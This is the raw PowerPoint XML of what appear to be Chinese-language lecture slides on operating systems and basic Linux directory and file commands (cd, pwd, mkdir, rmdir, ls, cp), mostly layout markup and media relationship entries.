              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>共享</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>且提供各個硬體裝置間彼此溝通的管道</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。有了作業系統，用戶與應用程式就不需要直接操控硬體，它們只需透過作業系統便可以得到所要的系統服務。如此不僅讓應用程式獨立於硬體之外，更可以在需求有衝突時獲得公平合理的解決。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930030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 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當前的目錄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.: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上一層目錄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前一個工作目錄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~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使用者的家目錄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~account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代表此帳號的家目錄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account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為帳號名稱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47520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894493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讓用戶在不同的目錄間切換，但該用戶必須擁有足夠的權限進入目的目錄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的目錄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 /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返回到根目錄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d ..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返回到上一層目錄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※ c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不帶參數執行時，就會進入主目錄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9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583009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w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顯示工作目錄，執行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wd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立刻得知目前所在工作目錄的絕對路徑名稱。</a:t>
            </a:r>
          </a:p>
          <a:p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pwd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--help][--version]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000066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9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20666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di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以創建目錄名稱指定的目錄並同時設置目錄的權限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mkdi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名稱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m&l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屬性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g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-mode&l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屬性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&gt;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建立目錄時同時設置目錄的權限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—parent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若新建目錄的父目錄目前尚未建立，則會一併自動創建這個父目錄。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000066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9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000018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mdi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刪除目錄名稱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mdir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錄名稱</a:t>
            </a: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或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—parents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刪除指定目錄後，若該目錄的父目錄已變成空目錄，則將其一併刪除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9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225006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mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -p n1/n2/n3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>rmdir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-p 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n1/n2  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>只能刪除空資料夾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84578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436925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400" dirty="0" smtClean="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>指令可以查詢檔案及目錄相關資訊</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>格式： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>ls [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>選項</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>檔案名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>目錄名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>...]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>參數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a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：顯示所有的檔案名稱，包括隱藏檔案。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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：顯示一個檔案列表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>除了隱藏檔案的所有類型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>，包含訪問權限、硬連結數目、擁有者、群組、檔案大小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>字節</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>和修改時間。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>-d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：顯示某個目錄的列表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>但不包括其內容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1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E979C3-AEBB-465D-9F81-DF6E804AEC07}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>9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3095054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p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指令可以複製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，並命名為檔案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格式：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cp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來源檔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 [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目的檔</a:t>
            </a:r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]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參數</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US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lvl="0"/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a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該選項通常在拷貝目錄時使用。它保留鏈接、檔案屬性，並遞歸地拷貝目錄，將檔案狀態、權限等資料都照原狀予以復制其作用等於</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="1400" kern="1200" dirty="0" err="1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dpR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選項的組合。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="zh-TW" sz="1100" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst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r>
              <a:rPr kumimoji="1" lang="en-US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-r </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="zh-TW" sz="1400" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1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遞歸複製檔案和子目錄 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="11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200" dirty="0" smtClean="0"/>
              <a:t>在預設的狀況下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>的來源檔與目的檔的權限是不同的，目的檔的擁有者通常是指令操作者本身</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="120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A8E05-228F-4E7E-BE4F-38EC0A4C3C56}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:pPr/>
              <a:t>9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1815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C2F6C3-9846-4330-8B31-536AC8552DD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63328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65F03E9-0780-47E9-B04D-74DEF37C010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8616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3D66E7D-7278-41A8-AB2A-66ABFFEFC91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9007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D79D9C9-1E4F-4E91-BD47-8FAAE515FF0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1332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04AF58C-64CA-4B4C-B6AD-8B3F3226981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627441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266825"/>
            <a:ext cx="4038600" cy="4859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266825"/>
            <a:ext cx="4038600" cy="4859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809EDA9-0ABC-406F-A738-260FCD17151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2806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3997131-5001-4A6E-BC6C-1BD31984AFD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56153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B193BF-99D2-4EBF-BC4B-CBFDF27FECB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0427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E693BEC-D962-42AC-B19B-0C1943279B2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0223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59A50B0-CD2E-46EE-AC00-5A95B4DF5A7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334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5B60DC-C4ED-4846-8971-9E3BD2FC93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213886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66825"/>
            <a:ext cx="8229600" cy="485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3575" y="6600825"/>
            <a:ext cx="21336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FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{1219B5A8-9122-413E-9314-0DDB792C3BEC}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1045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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1051" name="Group 27"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="971551" y="954088"/>
            <a:ext cx="7519988" cy="171450"/>
            <a:chOff x="612" y="601"/>
            <a:chExt cx="4737" cy="108"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1052" name="Line 28"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="612" y="652"/>
              <a:ext cx="4737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3" name="Line 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="612" y="709"/>
              <a:ext cx="473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4" name="Line 30"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="612" y="601"/>
              <a:ext cx="4737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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink45.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink40.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink42.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink47.xml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26.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink44.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink41.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink46.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink48.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink43.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25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2.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink764.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink766.xml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1.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink765.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image383.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3800.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink767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6.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink768.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink770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5.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink769.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image387.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image384.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink77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0.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink772.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink774.xml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9.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink773.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image388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emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink780.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image396.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image400.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink775.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink784.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink777.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image393.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink782.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink786.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide106.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image395.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39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00.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink779.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image399.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink776.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink781.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink785.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image392.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink783.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3890.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink778.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image394.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image398.emf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789.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image401.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink794.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink798.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.jpeg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image405.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2521.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink791.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image403.emf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image407.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide112.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink793.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink795.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image409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88.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2541.emf"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink797.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image861.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image402.emf"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image406.emf"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink799.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink790.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image404.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink787.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2531.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink792.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink796.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image408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2.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink800.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink802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1.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink801.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image413.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink803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7.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink808.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image422.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image426.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink812.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink805.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image419.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink810.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink814.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide114.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image421.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image423.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink8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6.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink807.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image425.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image429.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink804.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink809.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink813.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image427.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image418.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink811.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink817.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink806.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image420.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image424.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink815.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image428.e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customXml" Target="../ink/ink820.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image432.e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19.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image431.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink818.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image433.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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26.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image441.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image445.emf"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink839.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink830.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image449.emf"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image453.emf"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink843.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink823.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide116.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image440.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink8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5.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink825.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image444.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image448.emf"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink838.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image452.emf"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink842.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink822.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink827.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink831.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image446.emf"/><Relationship 